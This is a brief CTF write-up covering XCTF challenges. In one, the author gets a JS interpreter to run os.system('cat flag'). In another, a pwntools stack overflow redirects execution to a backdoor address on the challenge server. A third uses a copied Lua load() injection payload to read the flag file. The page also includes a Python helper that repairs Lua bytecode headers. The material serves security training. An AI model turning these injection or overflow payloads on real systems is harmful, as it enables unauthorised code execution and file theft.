[XCTF-pwn] 8-monkey 9-warmup 20_csaw-ctf-2016-quals-aul

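I couldn't solve this one; after searching for a write-up it turned out to be this simple. I have only ever used JS for writing web pages and had never used the os library.

The challenge is one big file that is basically unreadable. Running it gives a prompt, and typing help prints a few hints.

It is really just a JS interpreter, so running a command directly is enough to get the flag.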

js> os.system('cat flag')
os.system('cat flag')
cyberpeace{fbbe21cdff06b6bb983a88c58185de99}
js> 

warmup

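This challenge has a backdoor function and a stack overflow: overflow up to the return address and overwrite it with the backdoor address.

from pwn import *

p = remote('111.200.241.244', 62270)  # node3.buuoj.cn
# 0x48 bytes of padding reach the saved return address; 0x40060d is the backdoor
p.sendafter(b'>', b'A'*0x48 + p64(0x40060d))
p.interactive()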

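Challenges 20 and 8 belong to the same category: that one was JS, this one is Lua. Again there is nothing to write. I copied an exp found online; it explains everything from start to finish, but in practice only the final statement is what gets executed.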

SOLUTION
--------

The player is expected to follow a deductive path:

1. Connect and try the commands.
2. Discover that 'help' actually returns some binary data.
3. Upon analysis the player realizes that the binary data is a compiled LUA script.
4. The LUA script will not decompile because it is corrupt.
5. Comparing his own trials, the player will discover that the header is missing the first byte.
6. Once the header is fixed the player uses the unluac tool to decompile.
7. After auditing the code, the player notices the injection.
8. Use the `load('lines = io.lines("flag")\n for l in lines do writeline(l) end') -- ` string to obtain the key. There may be more than one solution.
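
Step 5 of the quoted solution (the dump is missing its first header byte) can be checked and repaired in a few lines of Python. This is an added example, not part of the original post or the copied exploit; the function names are hypothetical and the sample bytes are constructed for a Lua 5.3 chunk, since the page does not state the version.

```python
# Added example: repair a Lua bytecode dump whose leading ESC byte was lost.
LUA_SIGNATURE = b"\x1bLua"  # every compiled Lua chunk starts with ESC 'L' 'u' 'a'
KNOWN_VERSIONS = {0x51: "5.1", 0x52: "5.2", 0x53: "5.3", 0x54: "5.4"}


def repair_luac_header(data: bytes) -> bytes:
    """Return data with a valid Lua signature, restoring a dropped first byte."""
    if data.startswith(LUA_SIGNATURE):
        return data                      # header already intact
    if data.startswith(LUA_SIGNATURE[1:]):
        return LUA_SIGNATURE[:1] + data  # only the ESC byte is missing
    raise ValueError("not a Lua bytecode chunk (signature not found)")


def lua_version(data: bytes) -> str:
    """Read the version byte that follows the 4-byte signature."""
    fixed = repair_luac_header(data)
    if len(fixed) < 5:
        raise ValueError("chunk too short to contain a version byte")
    return KNOWN_VERSIONS.get(fixed[4], "unknown (0x%02x)" % fixed[4])


# Constructed sample (assumption): start of a Lua 5.3 chunk with ESC stripped
SAMPLE_DUMP = b"Lua\x53\x00\x19\x93\r\n\x1a\n"

if __name__ == "__main__":
    fixed = repair_luac_header(SAMPLE_DUMP)
    print(fixed[:5].hex(), "-> Lua", lua_version(SAMPLE_DUMP))
```

The version byte tells you which decompiler build or option matches the chunk before handing the repaired file to unluac.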
